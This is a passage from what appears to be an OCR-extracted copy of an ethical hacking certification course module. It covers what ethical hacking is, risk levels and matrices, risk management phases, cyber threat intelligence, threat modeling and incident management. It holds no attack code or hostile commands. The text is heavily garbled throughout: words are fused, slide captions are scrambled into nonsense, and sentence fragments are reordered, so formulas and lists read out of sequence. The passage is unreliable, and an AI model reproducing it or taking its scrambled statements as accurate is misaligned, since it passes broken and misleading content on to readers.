techniques of and directories. An ethicalhackermust beaware the toolsand
that attackers deployso that they can advocate and implement
countermeasuresdetailed in subsequent modules.
the
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
ModuleFlow CEH
©Brermen
sooner
©rcxing concent
InformationSecurity
awe and Standards
Ethical Hacking
Concepts
ethical
‘An
hacker to amalicious
hacker.
followsprocesses
maintain access to a computer
similar thoseof
systemare similarirrespective
Thesteps to gainand
of thehacker'sintentions.
an overview of ethicalhacking,
section provides
‘This whyethicalhacking
is necessary,the scope
andlimitationsofethicalhacking,andthe skillsof an ethicalhacker.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is Ethical Hacking?
(©
thicat
hacking involves
theuse of hacking
tools, tricks, andtechniques
to
identity
vulnerabilities
1@‘efocuses thetechiques
on simulating
vulnerabilities
used byattackers
ina system'ssecurity of
to veritythe existenceexploitable
|©eticalhackers
concerned
performsecuryassessmentsfran organization
authorities
withthepermission
of
Whatis Ethical Hacking?
Ethicalhacking of employing
is the practice computer and networkskillsi n order to assist
organizationsi n testingtheirnetworksecurity loopholes
forpossible andvulnerabilities.
White
Hats(also knownas security analysts
or ethicalhackers)are the individualsor expertswho
perform ethical hacking. Nowadays, most organizations (suchas private companies,
and government
Universities, organizations)
are hiring
WhiteHatsto assistthem in enhancing
their cybersecurity. Theyperform hacking
i n ethicalways, with the permission of the network
or systemowner and without the intention to cause harm. Ethicalhackersreportall
vulnerabilitiesto the system and network owner for remediation, thereby increasingthe
security of an organization's
informationsystem. Ethicalhacking involvesthe use of hacking
tools,tricks,andtechniques typically
usedbyan attackerto verify the existenceof exploitable
vulnerabilitiesi n system
security.
Today,
the term hacking
is closely
associatedwith illegal
and unethicalactivities. Thereis
continuingdebateas to whetherhacking can beethicalor not,giventhefactthat unauthorized
accessto anysystem is a crime. Considerthe following
definitions:
=
The noun “hacker―refersto a person who enjoys learning the detailsof computer
systems andstretching theircapabilites.
Theverb “tohack― describesthe rapiddevelopment of new programsor the reverse
engineering of existingsoftwareto make it better or more efficient i n new and
innovative ways.
Theterms “cracker― referto personswhoemploy
and“attacker― their hacking
skillsfor
offensivepurposes.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Theterm “ethical
hacker― professionals
refersto security who employ
their hacking
skillsfor defensivepurposes.
Most companies employ
IT professionals
to audit their systemsfor knownvulnerabilities.
Although this is a beneficialpractice,crackersare usually
more interestedi n usingnewer,
lesser-known and so these by-the-numbers
vulnerabilities, system auditsdo not suffice.A
companyneedssomeone
andexploits,
and recognize
ethicalhacker.
who can think like a cracker,
potential
vulnerabilities
where
others
cannot.of
keep
up with the newest vulnerabilities
Thisis the role the
Ethicalhackersusually
employ the same toolsand techniques
as hackers,
with the important
exceptionthat theydo not damage They
the system. evaluatesystemsecurity, update
the
administratorsregarding any discoveredvulnerabilities,
and recommendprocedures for
patching
those
Theimportant
vulnerabilities.
distinctionbetween ethicalhackersandcrackers is consent.Crackers
attemptto
gain unauthorizedaccess to systems, while ethicalhackersare always completelyopen and
aboutwhatthey
transparent a re doing
andhowthey are doing hacking
it. Ethical is, therefore,
always
legal.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WhyEthical Hacking
is Necessary
‘To
beat a hacker,youneedto think like one!
Ethical
hackingis necessaryast allows
forcounterattacks malicious
against hackers
through the
anticipating
methods used
to thesystem
breakinto
Reasonswhyorganizations
recruit ethical hackers
information
stems
.
potenti a s securityrisk
customer fear
Tehelp date
Tosraive
and strenathen
a
oreanations acuity
WhyEthical Hacking
is Necessary
(Cont'd)
Thiel HackersTryo
AnswertheFollowing
Quertions
© whet can an
with
intruderdo that information? Access
(Gaining andMaintaining
Access
phases)
©ering
tac
Does anyoneat theage
pases)
oraizaton note theintrude ater " or
successes?
(Reconsistance and
@ % oftheinformation
scomponents adequately
system protected, andpatched?
updated,
ical andCountermensores
Mackin ©by E-Comel
Copyright
outsideattack.As hackinginvolvescreative thinking,
vulnerability
testing,and security
audits
alone cannot ensure that the network is secure. To achievesecurity, organizationsmust
implement a “defense-in-depth―
strategy bypenetratingtheir networks
to estimate andexpose
vulnerabilities.
Reasonswhy recruitethicalhackers
organizations
=
Topreventhackersfromgainingaccessto the organization'sinformation
systems
=
=
Touncover
vulnerabilities
Toanalyze
explorerisk
andstrengthen
and
i n systems
an organization’s
their potential
securityposture,
asa
including
policies,
infrastructure,
network protection andend-userpractices
=
Toprovideadequate preventive breaches
measuresin orderto avoidsecurity
=
Tohelp safeguard
the customer data
=
Toenhancesecurity
awareness at all levelsi n a business
ethicalhacker'sevaluationof a client'sinformationsystemsecurityseeksto
‘An
basic
questions: answer three
attacker
1. Whatcan an seeon
checksbysystem
Normalsecurity
the targetsystem?
administrators
will often overlookvulnerabilities.The
hasto thinkaboutwhatan attackermight
ethicalhacker see during
the reconnaissance
and
.
scanning
Whatcan
phases
an
of an attack
intruderdowith that information?
The ethicalhackermust discern the intent and purposebehindattacksto determine
appropriatecountermeasures. Duringthe gaining-access phases
and maintaining-access
of an attack,the ethicalhacker
needsto be one stepaheadof the hackeri n order to
provide
adequate
protection.
attemptsbeing
Are the attackers’ noticedon the targetsystems?
Sometimesattackerswill tryto breacha systemfor days,
weeks,
or even months.Other
times
they
take thewill
gainbut
will
waitdoing
access
potential
time to assess the
before
use of exposed
theethicalhacker
reconnaissanceandcoveringtracksphases,
anything Instead,
damaging, they
information. Duringthe
shouldnotice andstopthe
will
attack
After carryingout attacks,hackersmay cleartheir tracksbymodifying logfiles and creating
backdoors, or bydeploying trojans.Ethicalhackersmust investigate whethersuchactivities
havebeenrecordedandwhat preventive measures havebeentaken.Thisnot only provides
themwith an assessmentof the attacker'sproficiency but also givesthem insight into the
existingsecuritymeasures of the systembeing evaluated.Theentire processof ethicalhacking
andsubsequent patching ofdiscoveredvulnerabilitiesdependson questionssuchas:
‘=
tryingto protect?
Whatis the organization
whomor whatare theytryingto protectit?
‘Against
ical andCountermensores
Mackin ©by E-Comel
Copyright
Areall thecomponents
of the information adequately
system protected,
updated,
and
patched?
andmoneyis the clientwilling
How muchtime,effort, to invest to gainadequate
protection?
Do theinformationsecurity measures comply with industry
andlegal standards?
Sometimes, i n orderto save on
or further
discovery,
resources prevent
to end the evaluationafter the first vulnerability is found; therefore,
the client might
it is important
ethicalhackerandthe clientwork out a suitableframeworkfor investigation
decide
that the
beforehand.The
clientmust be convinced of the importance of thesesecurityexercises through concise
descriptions
and must
of what is happening what is at stake.Theethicalhacker
to conveyto theclientthat it is never possible
alwaysbe improved.
to guard systems completely,
alsoremember
butthat theycan
ical andCountermensores
Mackin ©by E-Comel
Copyright
and Limitationsof Ethical Hacking
Scope
Scope Limitations
of
ie
(©Ethical
counter
acting acrucial
assessment,auditing,
component
rau, and
|@ Uniesthe businesses already
knowwhatthey
fr andwhytheyae hiringan
are looking
Vulnerabilties
‘A
hacker
can
only eta
tobetterunderstand
helpthe organisation
ts ecurty system:isp
FE}
andLimitations of Ethical Hacking
Scope
Cat
Securityexpertsbroadly categorize
computer crimes into two categories: crimes facilitatedbya
computer andthosein whichthecomputer is the target.
Ethicalhacking is 2 structured and organized securityassessment, usually as part of a
penetration test or security audit,and is a crucialcomponent of risk assessment, auditing,
counter fraud, andinformation systems security bestpractices. It is usedto identify risksand
highlight remedial actions. It is also used to reduce Information and Communications
Technology (ICT)costsbyresolving vulnerabilities.
Ethicalhackersdeterminethe scopeof the security assessmentaccording to the client's
securityconcerns. Manyethicalhackers are members of a “Tiger
Team.― A tigerteam works
together to perform a full-scale
test coveringall aspects of the network,as well as physical and
system
intrusion
ethicalhackershouldknowthe penalties
‘An of unauthorizedhackinginto a system.No ethical
hacking activities associated with a network-penetrationtest or securityaudit shouldbegin
before receivinga signed legal documentgiving the ethicalhackerexpress permission to
perform the hacking activities fromthe targetorganization.
Ethicalhackersmust be judicious
with their hacking
skillsandrecognize
the consequences
of misusing
thoseskills.
Theethicalhacker andmoralobligations.
must follow certain rulesto fulfill theirethical They
must
*
following:
do the
Gain authorizationfrom the client and have a signed contract giving the tester
to perform
permission the test.
Maintain confidentiality when performing the test and follow a Nondisclosure
(NDA)
‘Agreement with the clientfor the confidentialinformationdisclosedduring the
ical andCountermensores
Mackin ©by E-Comel
Copyright
test. The information
gathered mightcontain sensitive information,
and the ethical
hackermust not discloseany informationaboutthe test or the confidentialcompany
a
datato third party.
Performthe test up to but not beyondthe agreed-upon limits.For example,ethical
hackersshouldperform DoSattacksonly
if theyhavepreviously agreeduponthiswith
the client, Lossof revenue, goodwill,and worse consequences could befall an
organizationwhoseservers or applications
are unavailable
to customers because of the
testing.
Thefollowing stepsprovide a frameworkfor performing audit of an organization,
a security
whic!
+h will help that the test is organized,
in ensuring efficient,
andethical:
Talkto theclientanddiscuss
the needs
to beaddressed thetesting
during
Prepare
an
andsignNDAdocuments
Organizeethical hacking
with cient
the
team andprepare the schedule
for testing
the
test
Conduct
Analyze
the results
ofthetesting
and preparea report
Presentto
thereportfindingsthe client
Howfever,thereare limitationstoo. Unlessthe businesses
andwhy
first knowwhattheyare looking for
theyare hiring an outsidevendorto hacktheir systems i n the first place,
chances
a re
therewould not be muchto gain fromexperience.An ethicalhacker, thus,can onlyhelpthe
nization to better understandits securitysystem.
orgar It is up to the organization to place
the
rightsafeguards on the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Skills of an EthicalHacker
‘Technical
Skills Non-TechnicalSkills
Skills of an EthicalHacker
It essentialfor an ethicalhackerto acquire the knowledge
is and skillsto becomean expert
hacker
andto
be a good
use thisknowledgei n a lawfulm anner. Thetechnical
ethicalhackera re discussed below:
andnon-technicalskills
to
Technical Skills
©
Linux,
knowledge
In-depth of major
andMacintosh operating suchas Windows,
environments, Unix,
In-depth
knowledge
of networking technologies,
concepts, andrelatedhardware
andsoftware
© Acomputerexpertadept
at technicaldomains
© Theknowledge
© High
of
securityareasandrelatedissues
technicalknowledge
of howto launchsophisticated
attacks
Non-Technical
Skills
© Theability
to quickly new technologies
learnandadapt
©
[Astrong
ethic
to
a n solving
work
security
policies
andgood
Commitment organization's
problem and communicationskis
‘An
local
awareness of standards
andlaws
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
@ Wermaonscenty
Gyber
at Chain
© wrcring
concepts
EthicalHacking
@ ermationsocuty
Information Controls
Security
Information controlspreventthe occurrence of unwanted
security events andreducerisk to
the organization's
informationassets.Thebasicsecurityconceptscriticalto informationon the
Internet are confidentiality,
integrity,andavailability;
the concepts relatedto the persons
accessingthe informationare authentication,
authorization,
and non-repudiation,
Information
is the greatest It must be securedusingvarious policies,
asset of an organization. creating
awareness,employing securitymechanisms,or byother means.
Thissection dealswith InformationAssurance(IA),defense-in-depth, cyber
risk management,
threat modeling,
threat intelligence, incidentmanagement,
andAl andML concepts.
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
InformationAssurance(IA) CEH
|G ihrfersto theassurance thatthe integrity confdeniity,
availabilty, and authenticof infrmation
and information
‘vitae protected duringtheuse, potesing, store, andansmsion a nfrmation
{0 Someothe proces tht eip i n sci ifrmton sree nce
)
© veutngrewound
treats
@ retin cri nd nerstaon
©nein an nd resem
e gna
sien
ng
InformationAssurance(IA)
lA refersto the availability,
assurance of the integrity, confidentiality,
and authenticity
of
information
andinformationsystems duringthe usage,processing,
storage,andtransmissionof.
information.Security
expertsaccomplish informationassurance with the helpof physical,
technical,and administrative controls.InformationAssuranceand Information Risk
Management (IRM)ensure that onlyauthorizedpersonnel
access and use information.This
helps
i n achieving
informationsecurity
andbusinesscontinuity.
‘Some that help
ofthe processes in achieving
information
a ssuranceinclude:
Developinglocalpolicy, andguidance
process, i n sucha way to maintain theinformation
systemsat an optimum securitylevel
Designing networkand user authentication strategy—Designinga secure network
ensures the privacy of user recordsand other information on the network.
Implementing an effective user authenticationstrategysecures the information
system'sdata
Identifying
networkvulnerabilitiesand threats—Vulnerability
assessmentsoutline the
securitypostureof the network.Performing
vulnerability
assessmentsi n search
of
networkvulnerabilitiesandthreatshelpto takethe proper measures to overcome them,
Identifying
problems andresource requirements
Creating
a planfor identifiedresource requirements
Applying information
appropriate assurancecontrols
ical
them
nullify
andCountermensores ©
Mackin by E-Comel
Copyright
Providing informationassurance trainingto all personnel in federaland private
brings
organizations amongtheman awareness of informationtechnology
ical andCountermensores
Mackin ©by E-Comel
Copyright
Defense-in-Depth
©.
Defense.n-depth
is security strategy
In
which
placed
Layers
several layers
protection
throughout
an information
are
to direct
atacks
Defens
“©:
khelps prevent against
hesystem a ndits databecause
none
only
break layer leadsthe
attackerto the nent layer
Defense-in-Depth
Defense-in-depth strategyi n whichsecurity
is a security professionalsuse severalprotection
layers throughout an informationsystem. Thisstrategyusesthe military thatits more
principle
difficultfor an enemyto defeata complex andmulti-layered defensesystem than to penetrate
a single barrier. helps
Defense-in-depth to prevent directattacksagainstan informationsystem
and its databecausea breakin one layer onlyleadsthe attackerto the next layer.If a hacker
gains access to a system,defense-in-depth minimizes any adverse impactand gives
administrators and engineerstime to deploy
new or updatedcountermeasuresto prevent
recurrence of the intrusion,
Layers
Defense Figure
in
13:DefenseDepth
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is Risk?
(©
are
categorie
ks
levels
to event
(@fk refers tothedegree
estimated
onthe
of uncertainty
intdiferent according
tat an adverse
or expectation
ther
may
case
impact system
tothe ter
damage
(©used
osale the Risk
Ariseatrx
or
impact
ofthe
rik
Matrix
Risk Levels
ky considering probablykehood,andconsequence
Whatis Risk?
Riskrefersto the degree
of uncertainty or expectationof potential
damagethat an adverse
eventmaycause to the system specified
or its resources, under Alternatively,
conditions. risk
can alsobe:
‘=
Theprobability
of the occurrence
or have othernegative
liabilities.
of
athreator a n event that will damage,
impactso n the organization,
cause lossto,
either frominternalor external
value
to =Threat
theasset’s its stakeholders.
to,
IT riskcan beexpanded
xAsset
Vulnerability
RISK
Value x
consequencethe adverseevent
of an adverseevent
ical andCountermensores
Mackin ©by E-Comel
Copyright
RiskLevel
Risklevel is an assessmentof the resultedimpacto n the network.Variousmethodsexist to
differentiatethe risklevelsdepending
methodsusedto classify
on the riskfrequency
risksis to develop
and severity.
a two-dimensional
matrix.
One the common
of
Working
out the frequency
or probability
of an incidenthappening
(likelihood)
and its possible
consequences to analyze
is necessary risks.Thisis referred
to as thelevelof risk.Riskcan be
and theConsequence
representedcalculatedusing followingformula:
Levelof Risk= x Likelihood
categorized
Risksare into different
levelsaccordingto their estimated impacton the system
there are four risk levels,whichinclude extreme,high,medium,and low levels.
Primarily,
Rememberthat controlmeasures maydecrease the levelof a risk,but do not alwaysentirely
eliminate
the
risk.
|
RiskLevel Consequence Action
lowNegligible
|> steps of
riskdanger Takepreventive
Table
1 .1: RskLevels
to mitigatetheeffects
RiskMatrix
Theriskmatrix scales the riskoccurrence or likelihoodprobability,
along with its consequences
cr impact. Itis the graphicalrepresentation of riskseverity
andthe extent to whichthe controls
can or will mitigateit. TheRiskmatrix is one of the simplest processesto use for increased
visibility
of risk;i t contributesto the management's decision-making
capability. Theriskmatrix
definesvarious levelsof riskand categorizes them as the product
of negative probability
and
negativeseverity. Although there are manystandardrisk matrices, individual organizations
must create their
own,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Major Severe
veryHigh Extreme Extreme
Probability
High Wigh Extreme
Probability
Equal
Probability
low
Medium High High
Probability igh
veryLow
Probability towlow High
=
Consequence:
chance
Likelihood:The
of
the
riskoccurring
ofa riskevent that occurs
Theseverity
Note: Thisis an example of a risk matrix. Organizations
must create individualrisk matrices
basedo n their business
needs.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Risk Management
{@ Risk management
isthe process of reducing
nd maintaining
risk tan acceptable
levelby means ofawell-defined
andaivelyemployedsecunty program
Management Phases
Risk
isk Tdeuitcaon
©
Senter cman andtr eat
ane
eta
[Risk
Assessment Aesesssu
Risk
Treatment
implements
appropriate
forthe©Seles and control deniedrisks
Risk
Teacking
{espera
containers© harrow i ances
Risk
Reviow
the
performance
sk “6
vatates fhe enlementedmanagement
states
Risk Management
Riskmanagement is the processof identifying,
assessing,respondingto, andimplementing the
activities that controlhowthe organization managesthe potential effectsof risk.It has a
prominentplacethroughout life cycle
the security and is a continuous and ever-increasing
complex process.Thetypesof risksvary from organization but the act of
to organization,
a
RiskManagement Objectives
plan all
preparing riskmanagementis common to organizations.
=
potential
Identify is the main objective
risks—this of riskmanagement
Identify
‘=
the impactof risksandhelp the organizationdevelop betterrisk management
strategies andplans
Prioritize the risks, depending on the impact or severityof the risk, anduse established
riskmanagement methods, tools,andtechniques to assisti n thistask
Understand and
analyze
the identified
risk
events.
risksandreport
Controlthe riskandmitigateits effect.
Create awareness amongthe security staffanddevelop strategies and plansfor lasting
riskmanagement strategies.
Riskmanagement is a continuous process performed byachieving goals at everyphase. It helps
reduce and maintain riskat an acceptable
level utilizing
a well-definedand actively
employed
securityprogram.This processis appliedi n all stages for example,
of the organization, to
specific andoperational
networklocationsi n bothstrategic contexts.
ical andCountermensores
Mackin ©by E-Comel
Copyright
fourkeystepscommonly
‘The termedas riskmanagement
phases
are:
=
Risk
Risk Identification
Assessment
Risk
Treatment
‘=
RiskTracking
andReview
Every
organization whileperforming
shouldfollowtheabovesteps theriskmanagement
process
=
Risk
Identification
plan.Its main aim is to identify
Theinitialstepof the riskmanagement the risks—
including
the sources, causes, and consequencesof the internal and externalrisks
affecting
thesecurity
oftheorganization
beforetheycause harm.Theriskidentification
processdepends on the skill set of the people,and it differsfrom one organization to
another.
RiskAssessment
Thisphase assessesthe organization's risksand estimatesthelikelihood and impactof
thoserisks.Riskassessmentis an ongoingiterative processthat assigns for risk
priorities
and implementation
mitigation plans, whichin turn helpto determine the quantitative
andqualitativevalueof risk.Every organizationshouldadopt a riskevaluationprocessi n
to
order detect,prioritize, andremove risks.
Theriskassessmentdeterminesthe kindof riskspresent, their likelihood andseverity,
and plans
and the priorities for riskcontrol.Organizations perform a risk assessment
whentheyidentify a hazardbut are not ableto controli t immediately. A riskassessment
is followedbya regular
RiskTreatment
of
updateall informationfacilities.
method
oftreatment
Theappropriate
Thepeople
responsible
for the treatment
costs
The involved
Thebenefitsof treatment
Thelikelihoodof success
Waysandthe
to measure assess treatment
ical andCountermensores
Mackin ©by E-Comel
Copyright
RiskTracking andReview
‘An planrequiresa tracking
effectiverisk management and review structure to ensure
effectiveidentificationand assessmentof the risksas well as the use of appropriate
controlsand responses.The tracking and review processshould determinethe
measures and procedures adopted and ensure that the informationgathered to
perform the assessmentw as appropriate. Thereview phase evaluatesthe performance
of the implemented risk management strategies.Performing regular inspectionsof
policies and standards, as well as regularlyreviewingthem,helpsto identify the
opportunities for improvement. Further,the monitoring process ensures that there are
appropriate controlsi n placefortheorganization's activities andthat all proceduresare
understoodandfollowed,
ical andCountermensores
Mackin ©by E-Comel
Copyright
CyberThreatIntelligence
‘Typer
ofThreatintelligence
Test(Cis
the
(©cyber
of asintligence
eallection
andanaly
defined
information strategic Tactical
‘Operational
cyber
mitigate
thet intligence
1 0tdentyand
els the orpnization
valourbtiner ike
rome ak Nero ne
dvocedandproete defence
sateles
Threat Intelligence
Cyber
According to theOxforddictionary, possibility
a threat is definedas “the of a maliciousattempt
to damage or disrupta computernetworkor system.― A threatis a potentialoccurrence of an
undesiredevent that can eventually damage and interruptthe operational and functional
activities of an organization.A threat can affectthe integrity andavailabilityfactorsof an
organization. The impactof threatsis very greatand mayaffectthe state of the physical IT
Theexistenceof threatsmay be accidental,
assetsi n a n organization. intentional,
or dueto the
Cyber
of
impact some action.
threat intelligence,
usuallyknownas CTI, is the collectionand analysis of information
about threatsandadversaries and the drawing up of patterns that provide an ability
to make
knowledgeable decisionsfor preparedness, prevention, and response actions against various
cyberattacks. or discovering
It is the process of recognizing threats―
any “unknown that an
may faceso that necessary
organization can be applied
defensemechanisms to avoidsuch
occurrences. It involves collecting,
researching,
and analyzing
trends and technical
developments in the field of cyberthreats(including cybercrime, hacktivism,and espionage).
knowledge
‘Any aboutthreatsthat resultsi n an organization's planning and decision-making to
handleitis a pieceofthreat Intelligence. Themain aim ofCTIis to makethe organization aware
of existing
or emerging threatsand prepare themto develop a proactivecybersecurityposture
in advanceof exploitation. Thisprocess,whereunknownthreatsare converted into possibly
knownones, helps to anticipatethe attackbefore it can happen, and ultimately resultsi n a
betterand more secure system. Thus, threatIntelligence is usefuli n achievingsecure data
sharingandglobal transactionsamong organizations.
Threatintelligence processes can be usedto identify the risk factorsthat are responsible for
malwareattacks, SQLinjections, web applicationattacks, dataleaks,phishing, denial-of-service
ical andCountermensores
Mackin ©by E-Comel
Copyright
andotherattacks.Suchrisks,afterbeing
attack, filteredout, can be put on a checklist
and
handledappropriately.
Threatintelligence to handle cyber
is beneficialfor a n organization
threats
alsostrengthens
responding
andaidsin
planning
witheffective andexecution. Along
the organization's
suchrisks
against
defensesystem,
witha thorough analysis
of
the threat,
creates awareness about impending
CTI
risks,
‘Types Intelligence
ofThreat
Threatintelligence is contextualinformationthat describes threatsandguides organizations in
making various business decisions.It is extractedfrom a huge collectionof sources and
information.It provides operational insightbylooking outsidethe organization and issuing
threats
alertson evolving to the organization.
collectedfromdifferent sources,it is important
types.Thissubdivisionis performed
For the better management
Threat
Strategic
threat
Intelligence
Strategic intelligence provides information regarding
high-level cybersecurity
posture,threats,detailsaboutthefinancialimpactof various cyberactivities,attack
trends,andthe impactof high-level
business
decisions.Thisinformationis consumed by
the high-levelexecutivesandmanagement oftheorganization, suchas IT management
andCISO.It helps the management to identify current cyber risks,
unknownfuture risks,
threatgroups,and attributionof breaches. The intelligence obtainedprovides a risk
basedview that mainly focuseson high-level concepts of risksandtheir probability. It
mainly dealswith long-term issues and provides real-timealertsfor threats to the
organization's critical assets,such as IT infrastructure, employees, customers,and
applications,Thisintelligence is usedbythe management to makestrategic business
decisionsand to analyze their effect.Basedon the analysis, the management can
allocatesufficientbudget andstaffto protectcriticalT assetsandbusiness processes.
Strategicthreatintelligence is generally i n theformof a report that mainly focuses on
high-levelbusiness strategies. Sincethe characteristic of strategicthreat intelligenceis
preeminent,the datacollectionalsorelatesto high-levelsources and requireshighly
skilledprofessionals
to extract information.Thisintelligence
is collectedfrom sources
suchas OSINT,CTI vendors,andISAOsandISACs.
threat intelligence
Thestrategic helps identify
organizations any similarpastincidents,
their intentions,and any attributesthat mightidentify
the attacking
adversaries,
why
the organization is withinthe scopeof the attack,
majorattacktrends,
andhow to
reducethe risklevel.
Generally, includesthe following
threatintelligence
strategic information:
©. Thefinancialimpactof cyber
activity
© Attribution forintrusions anddatabreaches
ical andCountermensores
Mackin ©by E-Comel
Copyright
Threatactorsandattacktrends
threatlandscape
‘The for various industry
sectors
Statisticalinformationon databreaches,
datatheft,andmalware
>
Geopolitical
conflicts
various involving
on howadversary
Information TTPs change
cyberattacks
over time
Industry
sectorsthat might
impactdueto high-level
business
decisions
ical andCountermensores
Mackin ©by E-Comel
Copyright
identify
andstopupcomingattacks, improveearly-stage
attackdetecting
capability,
and
damage
reducean attack’s to ITassets.
Operationalthreat intelligenceis generally
collectedfrom sources suchas humans,
socialmedia, andchatrooms; it mayandalsobecollectedfromthe real-worldactivities
and events that result i n cyberattacks.
Operationalthreat intelligence
is obtainedby
analyzing humanbehavior, threat groups,and bysimilarmeans. Thisinformationhelps
to predict future attacksand thus enhancesincidentresponseplans and mitigation
strategies.Operational threat intelligencegenerally
appearsas a reportthat contains
identified maliciousactivities, recommendedcourses of action, and warningsof
emerging
attacks.
TechnicalThreatIntelligence
Technicalthreat intelligenceprovides informationabout resources an attackeruses to
perform an attack;thisincludescommand andcontrolchannels, tools,andotheritems.
It hasa shorterlifespancompared to tacticalthreatintelligenceandmainly focuseson a
ical andCountermensores
Mackin ©by E-Comel
Copyright
ThreatModeling
CEH
Threatmodeling3 sk assessmentapproach Foranalysing
the secur ofan apoliatonbycapturing,
organising,
allthe information
and analyzing thataffect the sect ofan application
ModelingProcess
‘Threat
on
apt
Secwry
Master
needs
tobe aps to determine effort
h ow much puttowardsubseqentsteps
03) Pesemessette
|
04 den
threat | ety
ren relearttothecontroseario
Shtanedinsens
ands and contr ws the ifrmation
05 ete ae weaknesses
Memtity r elate tothe
threats
vulnerabiity
categories
foundusing
Threat Modeling
Threatmodeling is a risk assessmentapproachfor analyzing
the security of an application
by
capturing,organizing,andanalyzingalltheinformationthataffectsit. Thethreatmodelconsists
of three majorbuilding blocks:understanding
the adversary'sperspective, characterizing
the
security
of
the system,
documented
progresses.
and determining
threats.
Every
application
shouldhavea developed
threatmodelthat shouldberevisitedas the application
and
evolvesanddevelopment
Improve
security
design
Whenusingthis approach, shouldkeep
an administrator the following
i n mind:
+
Trynot to be rigidabout specific stepsor implementations; focuson the
instead,
approach. If any stepbecomesimpassable, go rightto step4 of the threat modeling
processandidentify theproblem.
Usescenariosto scopethe modeling
activity.
Useexistingdesign documents.Useitems likedocumenteduse cases or use stories,
architecturaldiagrams,
dataflow diagrams,
Startwith a whiteboardbeforecapturing
or
information
other
design
documentation.
i n documents
or gettinglost in
details.It may be helpful
to use a digital
camera with printingcapabilities
to document
anddistribute theinformationfromthewhiteboard.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usean iterative approach. Addmore detailsand improvethe threat modelas design
and development continue. Thiswill helpwith becoming familiarwith the modeling
processanddeveloping the threatmodelto betterexamine more possiblescenarios
Obtaininputabout the hostand network constraints from the systemand network
administrators,To better understandthe end-to-enddeployment diagram, obtain as
muchinformationas possible abouthost configurations, firewall policies,
allowed
protocolsandports,andotherrelevantdetails.
Thethreatmodeling involvesfivesteps:
process
1. Identify Objectives
Security
Security
objectivesare the goalsand constraints related to the application's
confidentiality, and availability.
integrity, Security-specific
objectivesguidethe threat
modeling
efforts and helpto determinehow mucheffort needsto be put toward
subsequentsteps.To identifysecurity objectives,
administratorsshould ask the
following
questions:
© Whatdatashouldbe protected?
© Arethereany compliance
requirements?
© qualty-of
Are therespecific service requirements?
© Are thereintangible
assetsto protect?
.
Application
Overview
Identify data flows,
the components, and trust boundaries.To draw the end-to-end
deployment
scenario, the administrator First,theyshould
shoulduse a whiteboard.
draw a rough diagramthat explains
the workings
and structure of the application,
its
subsystems, and its deployment The deployment
characteristics. diagram should
contain the following
© deployment
End-to-end topology
Logical
layers
Key
components
Keyservices
portsand protocols
Communication
Identities
Externaldependencies
Identify
Roles
Theadministratorshouldidentify
people and the rolesand actions theycan perform
within the application. are there higher-privileged
For example, groupsof users?Who
can readdata?Whocan updatedata?
Who
can deletedata?
ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify
KeyUsage
Scenarios
Theadministratorshoulduse the application’s
usecasesto determineits objective.
Use
explain
‘cases howthe applicationis usedandmisused.
Identify
Technologies
and keyfeaturesof the software,
Theadministratorshouldlistthe technologies as well
as the following
technologiesi n use
Operating
systems
Web
server
Database
software
server software
Technologies business,
for presentation, anddataaccess layers
©
Developmentlanguages
Identifying technologies
these helps on technology-specific
to focus threats.
Identify
Application Mechanisms
Security
Theadministratorshouldidentify
some key
pointsregarding
the following:
©. Input
anddatavalidation
© Authorizationandauthentication
©.
Sensitive
data
Configuration
management
Session
management
Parameter
manipulation
Cryptography
Exception management
‘Auditing
andlogging
Theseeffortsai m to identify
relevantdetailsand to adddetailswhererequired,
or to
identify
areas
Decompose
thatrequiremore.
the Application
In this step,the administratorbreaksdown the application to identifythe trust
boundaries, data flows,
entrypoints,and exit points.Doing
so makesit considerably
easier to find
Identify
more
and
relevant
TrustBoundaries
more detailedthreatsandvulnerabilities.
Identifyingthe application’s
trust boundarieshelps the administrator to focuson the
relevanta reasof the application.
It indicateswheretrust levelschange.
© Identify boundaries
outer system
ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify or key
accesscontrolpoints whereaccessrequiresextra privileges
places or
role membership
>
Identify
Identify
trust boundaries
DataFlows
from a dataflow perspective
Identify
Entry Points
application's
The entrypointcan also serve as an entrypointfor attacks.All users
interact with the application
at these entrypoints.Other internal entrypoints
uncoveredbysubcomponents over the layers
oftheapplicationmaybepresent onlyto
supportinternal communication with other components. The administratorshould
identify
theseentrypointsto determinethe methodsusedbyan intruder to get i n
throughthem. They shouldfocuson the entrypointsthat allow access to critical
adequate
functionalitiesandprovide defensefor them.
Identify
ExitPoints
Theadministratorshouldalsoidentify thepointswherethe applicationtransfers
datato
the client or external systems.They should prioritize
the exit pointsat whichthe
application clientinputor datafromuntrustedsources,suchas a
writes datacontaining
shareddatabase
|.
Identifyidentify
Threats
Theadministrator should threatsrelevantto the controlscenario and context
using the informationobtainedi n the application
overview and decompose application
of the development
steps.Theyshouldbringmembers andtest teams together
to
identify
potential
threats.Theteam shouldstart with a list of common threatsgrouped
bytheirapplication
vulnerability Thisstepusesa question-driven
category. approach
to
helpidentify
threats.
5.Identify
A
Vulnerabilities
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
Incident Management CEH
iaset
(8 Incidentmanagement
of to analyze,
plore,
defined
resolve
incidents
ent,
processes and security
IncidentManagement
Vulnerability
Handling InedentHandling
Artifact
Handling
rn aotDarcie
[irae] Fed
Incident Management
Incidentmanagement is a set of definedprocesses to identify,
analyze, prioritize,and resolve
incidentsto restore the system
security as soon as possible,
to normalservice operations and
prevent recurrence of the incident. It involvesnot onlyresponding to incidentsbut also
triggeringalertsto preventpotential administratormust identify
risksand threats.A security
softwarethat is open to attacksbeforesomeone takesadvantage of the vulnerabilities.
includes
the
following:
Incidentmanagement
+
Vulnerability
analysis
+
+
Artifact
Security
awareness
analysis
training
+
Intrusiondetection
+
‘The
monitoring
Publicor technology
incidentmanagement is designed
process to:
+
+
Improve
service
problems
Resolve
quality
proactively
+
+
Reduce
Meet incidents
organization
the impact
of
availabilty
service
onan
requirements
or its business
+
staffefficiency
